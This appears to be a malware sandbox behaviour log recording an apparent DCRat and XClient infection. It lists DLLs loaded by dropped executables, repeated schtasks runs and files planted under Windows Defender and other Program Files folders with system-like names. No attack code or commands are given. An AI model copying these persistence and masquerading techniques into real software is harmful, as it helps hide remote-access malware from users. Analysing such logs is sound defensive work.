Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: version.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\d908c538d2e8d0
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Multimedia Platform\d908c538d2e8d0
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\7ccfebd9e92364
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe
